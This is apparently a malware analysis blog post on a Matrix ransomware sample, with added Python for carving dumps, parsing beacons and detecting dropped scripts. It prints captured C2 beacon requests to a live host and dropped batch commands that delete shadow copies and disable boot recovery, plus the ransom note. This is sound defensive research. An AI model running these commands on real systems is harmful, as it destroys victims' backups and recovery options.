New Malware sample : Trojan-Ransom.Win32.Matrix.ac

Ransomware Matrix

Being up very early today I could not resist the urge to pull another malware sample from malwr.com.

I downloaded the following sample (which now seems to be a second-generation Matrix ransomware variant):

SHA1 58a6234d3c6aed251b09b8f54611d9679c84af55
SHA256 e7b3102e3e49c6c3611353d704aae797923b699227df92d97987a2e012ba3f25

The malware analysis done on malwr.com shows a big variation in how vendors name the sample, and no network traffic is seen in the network analysis section. Names that several antivirus vendors have in common are Graftor, GenKryptik and Ransom Matrix.

The behavioral analysis shows that this executable starts some new processes with random names.

I have run the sample multiple times and the spun-up processes indeed seem to have random names.

The Graftor sample, let's just call it that way for minimal SEO purposes 🙂, uses the following API call order to load a first-round unpacked executable into a new process with the same name as the initial executable (the sequence typically seen in process hollowing): CreateProcessA, GetThreadContext, SetThreadContext, followed by ReadProcessMemory and WriteProcessMemory. The WriteProcessMemory calls take place in multiple loops.

Dumping the memory at the address held in the ECX register gives me a dump that needs to be edited with a hex editor to make it a valid PE32 executable. There is a lot of "junk" placed before the MZ signature that needs to be removed in order to make it a valid executable.


Removing all the data before the MZ signature gives you the following file:

PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed

SHA1 2c1b0fb35c8d4d2ce28190dc5e0ceeabddad35dc

SHA256 cf6ebd60cd7c46a0c17dc192322f4cd4fc93b44add0dae17abb0d6c0c203cf9e

The UPX unpacked file has a SHA256 of 3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1
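The hex-editor step described above (drop everything before the MZ signature) can be automated. The script below is an added example, not code from the original post: it walks a raw memory dump looking for an MZ header whose e_lfanew field actually points at a "PE\0\0" signature, so a stray "MZ" inside the junk is not mistaken for the real header, and then carves the image out. The dump it runs on is constructed inline (junk, a decoy "MZ", then a minimal 32-bit PE header) so it works offline; on a real dump you would pass the bytes read from the debugger's memory dump file.

```python
"""Carve a PE image out of a raw memory dump by locating a validated MZ/PE header.

Added example (not code from the original post). Mirrors the manual hex-editor
step from the post: junk bytes before the MZ signature are discarded and the
remainder is returned as a standalone PE image. The sample dump is constructed
here so the script runs offline.
"""
import struct

MZ = b"MZ"
PE_SIG = b"PE\0\0"
MACHINE_I386 = 0x014C   # IMAGE_FILE_MACHINE_I386
MACHINE_AMD64 = 0x8664  # IMAGE_FILE_MACHINE_AMD64


def find_pe_offset(data: bytes) -> int:
    """Return the offset of the first MZ header whose e_lfanew points at a
    valid PE signature, or -1 if none is found. A bare 'MZ' in junk is not
    enough: the e_lfanew -> 'PE\\0\\0' link must hold."""
    pos = data.find(MZ)
    while pos != -1:
        # e_lfanew is the DWORD at offset 0x3C of the DOS header
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe_off = pos + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and data[pe_off:pe_off + 4] == PE_SIG:
                return pos
        pos = data.find(MZ, pos + 1)
    return -1


def carve_pe(data: bytes) -> bytes:
    """Strip everything before the validated MZ header."""
    off = find_pe_offset(data)
    if off < 0:
        raise ValueError("no valid PE header found in dump")
    return data[off:]


def pe_machine(image: bytes) -> int:
    """Read IMAGE_FILE_HEADER.Machine from a carved image (0x14C = i386)."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    return struct.unpack_from("<H", image, e_lfanew + 4)[0]


def build_fake_dump() -> bytes:
    """Constructed sample: junk, a decoy 'MZ' with a bad e_lfanew, then a
    minimal DOS header + PE signature + file header for a 32-bit image."""
    junk = b"\x00\x11\x22MZjunkjunk" + b"\xCC" * 50   # decoy MZ inside the junk
    dos = bytearray(0x40)
    dos[0:2] = MZ
    struct.pack_into("<I", dos, 0x3C, 0x80)            # e_lfanew = 0x80
    stub = b"\x00" * (0x80 - 0x40)                     # padding where the DOS stub sits
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<HHIIIHH", MACHINE_I386, 3, 0, 0, 0, 0xE0, 0x0102)
    return junk + bytes(dos) + stub + PE_SIG + file_hdr + b"\x00" * 0xE0


if __name__ == "__main__":
    dump = build_fake_dump()
    image = carve_pe(dump)
    print(f"header found at offset {find_pe_offset(dump)}, carved {len(image)} bytes, "
          f"machine=0x{pe_machine(image):04x}")
```

The carved bytes still need the usual post-dump fixes before they load cleanly (in this sample the image was also UPX-packed), but validating the e_lfanew link first saves you from carving at the wrong "MZ" when the junk happens to contain those two letters.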

VirusTotal shows a 17/61 detection ratio for this sample; Kaspersky seems to miss it. The most common trojan name is vmHfa4YZuwfi. From the sandbox signature you can see that this time there is some network traffic: there are some requests to a web API running on statcs.s76.r53.com.ua (31.41.216.90).

Sample of Ransomware Matrix network traffic:

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=WIN_5.1_32|ADMIN_YES|INT_0 HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=START HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=MASTER_STARTED HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=PREPARING HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

If you look at the GET requests you see that they follow a certain order; the phase parameter indicates the phase in which the local process is running.
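To reconstruct that phase order from a pcap export or proxy log you can parse the request blocks and group them per apikey/sid. The following is an added example, not part of the original post: it parses raw HTTP request text, pulls apikey, sid and phase out of the query string, and flags the check-in pattern (addrecord.php plus the Synapse User-Agent) as a detection heuristic. The sample traffic is copied from the requests above with one unrelated request mixed in to show that it is ignored.

```python
"""Extract the check-in sequence from the Matrix beacon HTTP requests.

Added example, not from the original post. Parses raw HTTP/1.0 request
blocks, pulls apikey / sid / phase out of the query string, and flags the
request pattern (addrecord.php + Synapse User-Agent) so the phase order can be
reconstructed from a pcap export or proxy log.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Sample traffic: three beacon requests from the post plus one unrelated
# request (constructed) that the heuristic must not flag.
SAMPLE_TRAFFIC = """GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=WIN_5.1_32|ADMIN_YES|INT_0 HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=START HTTP/1.0
Host: statcs.s76.r53.com.ua
User-Agent: Mozilla/4.0 (compatible; Synapse)

GET /index.html HTTP/1.1
Host: example.invalid
User-Agent: Mozilla/5.0

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=MASTER_STARTED HTTP/1.0
Host: statcs.s76.r53.com.ua
User-Agent: Mozilla/4.0 (compatible; Synapse)
"""

REQUEST_LINE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]$")


def parse_requests(raw: str) -> list[dict]:
    """Split raw text into request blocks and return one dict per request."""
    out = []
    for block in re.split(r"\n\s*\n", raw.strip()):
        lines = block.strip().splitlines()
        m = REQUEST_LINE.match(lines[0])
        if not m:
            continue
        headers = {}
        for line in lines[1:]:
            k, _, v = line.partition(":")
            headers[k.strip().lower()] = v.strip()
        url = urlsplit(m.group(2))
        # parse_qs keeps the '|' separated values intact; take the first value per key
        qs = {k: v[0] for k, v in parse_qs(url.query).items()}
        out.append({"method": m.group(1), "path": url.path, "query": qs,
                    "host": headers.get("host", ""),
                    "ua": headers.get("user-agent", "")})
    return out


def is_matrix_beacon(req: dict) -> bool:
    """Heuristic: addrecord.php with apikey+sid+phase and the Synapse UA."""
    q = req["query"]
    return (req["path"].endswith("/addrecord.php")
            and {"apikey", "sid", "phase"} <= q.keys()
            and "Synapse" in req["ua"])


def beacon_phases(raw: str) -> list[str]:
    """Return the phase values of the matching requests, in the order seen."""
    return [r["query"]["phase"] for r in parse_requests(raw) if is_matrix_beacon(r)]


def beacon_sessions(raw: str) -> dict[tuple[str, str], list[str]]:
    """Group phases per (apikey, sid) so several infected hosts can be told apart."""
    sessions: dict[tuple[str, str], list[str]] = {}
    for r in parse_requests(raw):
        if is_matrix_beacon(r):
            key = (r["query"]["apikey"], r["query"]["sid"])
            sessions.setdefault(key, []).append(r["query"]["phase"])
    return sessions


if __name__ == "__main__":
    for key, phases in beacon_sessions(SAMPLE_TRAFFIC).items():
        print(key, " -> ".join(phases))
```

Keying on apikey and sid rather than on the source IP is what lets you separate hosts behind the same NAT; the first phase value also carries the OS version and admin flag, which is useful when triaging which machines the sample reached.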

More content will be added to this post, because so far I have only dumped the process, modified the dumped file to get a valid executable, unpacked the sample, and run it on VirusTotal and malwr.com. Next is to let the new sample run to see what the end result is (is it ransomware, a trojan, a backdoor?) and to debug it further in Olly.

Update:

All right, part 2. I have loaded the unpacked malware sample into the debugger to see what it is about. Looking at the imported functions one can tell that the sample is probably also ransomware (some encryption functions and some file-find functions).

The Ransomware Matrix Dropped Files.

The sample creates a directory in C:\Users\*username*\AppData with the name faLI4zd2GZRK, followed by creating a file that is started using cmd.exe:

SHA256: 3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1

The common denominator between the recognized names is Ransomware Matrix, and the consistency between the antivirus vendors is high (MSIL/MATRIX VARIANT).

Starting this file spins up a lot of processes, mainly by using cmd.exe.

6zZUGDT8.cmd (cleanup)

ping -n 3 localhost
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\AAJQuHI7.exe"
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\AAJQuHI7.exe"

23Qn6rcH.cmd (cleanup)

ping -n 3 localhost
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\YtzyQMj2.exe"
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\YtzyQMj2.exe"

bclFRufv.cmd (cleanup)

ping -n 3 localhost
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\Gxu5OE8o.exe"
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\Gxu5OE8o.exe"

lUGRjier.cmd (cleanup)

ping -n 3 localhost
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\uuNj0saB.exe"
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\uuNj0saB.exe"

OFZFP9q6.cmd (cleanup)

ping -n 3 localhost
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\BqfAUxVQ.exe"
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\BqfAUxVQ.exe"

P7E4WtUK.cmd (cleanup)

ping -n 3 localhost
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\zjVeqooM.exe"
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\zjVeqooM.exe"

qp3h899p.cmd (cleanup)

ping -n 3 localhost
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\iRj4g0sE.exe"
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\iRj4g0sE.exe"

RMG5LL7V.cmd (cleanup)

ping -n 3 localhost
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\psnwTLzb.exe"
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\psnwTLzb.exe"

tJxQTMw0.cmd (cleanup)

ping -n 3 localhost
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\m1n0Sdz5.exe"
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\m1n0Sdz5.exe"

WnRddttG.cmd (cleanup)

ping -n 3 localhost
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\n9RwW8GD.exe"
del /f /q "C:\Users\MALWAR~1\AppData\Local\Temp\n9RwW8GD.exe"

adlo5t9M.cmd (deletes shadow copies, disables boot to recovery and sets the boot status policy to ignore all failures; each step is retried after a ping-based delay)

echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK
ping -n 30 localhost
wmic.exe process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK
ping -n 10 localhost
cmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
ping -n 10 localhost
echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK
vssadmin.exe delete shadows /all /quiet
echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK
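The dropped .cmd files fall into two classes: the self-deletion stubs (ping delay, then del of a temp executable) listed above, and the recovery-inhibition script that deletes shadow copies and changes the boot configuration. Both are worth detecting from the script body or from command-line telemetry. The classifier below is an added example, not code from the original post: it runs the two patterns over constructed script bodies modelled on the dropped files, and unwraps the wmic "process call create" form so the vssadmin/bcdedit calls hidden inside the quoted argument are still inspected.

```python
"""Classify dropped .cmd helper scripts: self-deletion stubs vs. recovery
inhibition (shadow copy deletion, bcdedit recovery/bootstatuspolicy changes).

Added example, not from the original post. Meant for triage of dropped batch
files or for matching command-line telemetry; the sample bodies are constructed
to mirror the scripts shown in the post.
"""
import re

# Patterns a defender alerts on; case-insensitive because cmd.exe is.
RECOVERY_INHIBIT = {
    "shadow_copy_delete": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "recovery_disabled": re.compile(r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I),
    "bootstatus_ignore": re.compile(r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I),
}
SELF_DELETE = re.compile(r'del\s+/f\s+/q\s+"?([^"\r\n]+\.exe)"?', re.I)
PING_DELAY = re.compile(r"ping\s+-n\s+(\d+)\s+localhost", re.I)
WMIC_WRAPPER = re.compile(r'wmic(?:\.exe)?\s+process\s+call\s+create\s+"([^"]*)"', re.I)


def unwrap_wmic(line: str) -> str:
    """If the line launches a command via wmic, return the inner command so
    the nested vssadmin/bcdedit calls are still inspected."""
    m = WMIC_WRAPPER.search(line)
    return m.group(1) if m else line


def classify_script(body: str) -> dict:
    """Return findings and a verdict for one batch script body."""
    findings = {"deleted_files": [], "recovery_inhibit": set(), "delay_seconds": 0}
    for raw in body.splitlines():
        line = unwrap_wmic(raw.strip())
        for m in PING_DELAY.finditer(line):
            # 'ping -n N localhost' sleeps roughly N-1 seconds (one second between echoes)
            findings["delay_seconds"] += max(int(m.group(1)) - 1, 0)
        for m in SELF_DELETE.finditer(line):
            if m.group(1) not in findings["deleted_files"]:
                findings["deleted_files"].append(m.group(1))
        for name, pat in RECOVERY_INHIBIT.items():
            if pat.search(line):
                findings["recovery_inhibit"].add(name)
    if findings["recovery_inhibit"]:
        findings["verdict"] = "recovery-inhibition"
    elif findings["deleted_files"]:
        findings["verdict"] = "self-delete-stub"
    else:
        findings["verdict"] = "benign-or-unknown"
    return findings


# Constructed sample scripts modelled on the dropped files in the post.
CLEANUP_CMD = '''ping -n 3 localhost
del /f /q "C:\\Users\\MALWAR~1\\AppData\\Local\\Temp\\AAJQuHI7.exe"
del /f /q "C:\\Users\\MALWAR~1\\AppData\\Local\\Temp\\AAJQuHI7.exe"
'''
INHIBIT_CMD = '''echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK
ping -n 30 localhost
wmic.exe process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
ping -n 10 localhost
vssadmin.exe delete shadows /all /quiet
'''

if __name__ == "__main__":
    for name, body in (("cleanup", CLEANUP_CMD), ("inhibit", INHIBIT_CMD)):
        print(name, classify_script(body))
```

The wmic unwrapping matters in practice: process-creation telemetry often shows wmic.exe as the parent, with vssadmin.exe and bcdedit.exe appearing as children of a cmd.exe spawned by WMI rather than of the script itself, so a rule that only looks at the script's direct child processes misses the first attempt.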

Besides all the executables dropped in the temp folder there are also some other executables dropped and loaded. All three files are exactly the same (identical SHA256) -> Ransomware Matrix:

tEajMFBE.exe
SHA256: 3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1
Trojan-Ransom.Win32.Matrix.ac

gvfkQqDU.exe
SHA256: 3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1
Trojan-Ransom.Win32.Matrix.ac

GGIU63mQ.exe
SHA256: 3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1
Trojan-Ransom.Win32.Matrix.ac

Dropped Ransomware Message

Аttеntiоn! Аll yоur filеs wеrе еnсryрtеd with RSА-2048 аlgоrithm.
Withоut уоur pеrsоnаl dесrуptiоn kеy dаtа rеcоvеrу is impоssiblе!
Tо gеt yоur uniquе kеy аnd dесrурt thе filеs, Yоu hаvе to sеnd thе fоllоwing cоdе:
COSLb0cVd9bCx1vp-3D425A556DA60F50
tо оur е-mаil аddrеss: bluetablet9643@yahoo.com
Thеn Yоu will rеciеvе аll nеcеssаry instruсtiоns.
Yоu hаvе оnlу 96 hоurs tо rеcоvеr yоur dаtа! Аftеr this timе yоur uniquе dесrурtiоn kеy will bе аutоmаticаllу dеlеtеd аnd filе dесrурtiоn will bеcоmе imроssiblе!
Hurrу uр! Еасh 12 hоurs thе pауmеnt sizе will bе аutоmаticаllу inсrеаsеd bу 100$!
Аll thе аttеmpts оf dесryptiоn by yоursеlf will rеsult оnly in irrеvосаble lоss оf yоur dаtа.
If yоu still wаnt tо try tо dеcrypt thеm by yоursеlf plеаsе mаkе а bаckup аt first bеcаusе thе dесryptiоn will bеcоmе impоssiblе in cаsе оf аny chаngеs insidе thе filеs.
If yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаil fоr mоrе then 24 hours (аnd оnly in this cаsе!), usе thе rеsеrvе е-mаil аddrеss:
decodedecode@yandex.ru

The ransomware note shown in the background looks like this: (image: Ransomware Matrix)
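One detail of the ransom note above is easy to miss when reading it: many of its letters are Cyrillic look-alikes (а, е, о, с, р, у, А) mixed into English words, so a plain ASCII search for "Attention" or "encrypted" does not match the note even though it reads as English. The script below is an added example, not code from the original post: it maps the common Cyrillic confusables back to Latin before keyword matching and flags words that mix both scripts, which is a stronger signal of deliberate substitution than the presence of Cyrillic alone. The sample string is constructed from explicit code points rather than copied from the note.

```python
"""Normalise Cyrillic look-alike letters in a ransom note back to Latin so
string-based detection (YARA, grep, log search) still matches.

Added example, not from the original post. The sample text is constructed
with explicit code points in the same substitution style as the note.
"""
import unicodedata

# Cyrillic code point -> visually identical Latin letter (lower and upper case).
HOMOGLYPHS = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
    "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T",
    "\u0425": "X",
}


def normalize_homoglyphs(text: str) -> str:
    """Replace known Cyrillic confusables with their Latin counterparts."""
    return "".join(HOMOGLYPHS.get(ch, ch) for ch in text)


def mixed_script_words(text: str) -> list[str]:
    """Return words containing both Latin and Cyrillic letters: a strong signal
    of deliberate homoglyph substitution rather than genuine Russian text."""
    flagged = []
    for word in text.split():
        scripts = set()
        for ch in word:
            if ch.isalpha():
                name = unicodedata.name(ch, "")
                if name.startswith("CYRILLIC"):
                    scripts.add("Cyrillic")
                elif name.startswith("LATIN"):
                    scripts.add("Latin")
        if {"Cyrillic", "Latin"} <= scripts:
            flagged.append(word)
    return flagged


def note_matches(text: str, keywords=("Attention", "encrypted", "RSA-2048")) -> bool:
    """Keyword match after normalisation, which is what a detection rule should do."""
    norm = normalize_homoglyphs(text)
    return all(k in norm for k in keywords)


# Constructed sample: "Attention! All your files were encrypted with RSA-2048
# algorithm." with Cyrillic а е о с А substituted as in the note.
SAMPLE_NOTE = ("\u0410tt\u0435nti\u043en! \u0410ll y\u043eur fil\u0435s w\u0435r\u0435 "
               "\u0435n\u0441rypt\u0435d with RS\u0410-2048 \u0430lg\u043erithm.")

if __name__ == "__main__":
    print("raw ASCII match :", "Attention" in SAMPLE_NOTE)
    print("normalised      :", normalize_homoglyphs(SAMPLE_NOTE))
    print("mixed words     :", mixed_script_words(SAMPLE_NOTE))
    print("rule matches    :", note_matches(SAMPLE_NOTE))
```

In a YARA or log-search rule the practical consequence is to either match on the normalised text or write the strings with the substituted letters in them; matching on the e-mail addresses and the apikey-style code in the note is unaffected, since those stay pure ASCII.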

Some more files are created (or dropped) by Matrix Ransomware.

A file with a unique ID, which contains the code "b264-4739-96de-e3df2c740a1e" and my system name. Also, most files end up encrypted with a new extension appended, for example odbg201.zip.b10cked.
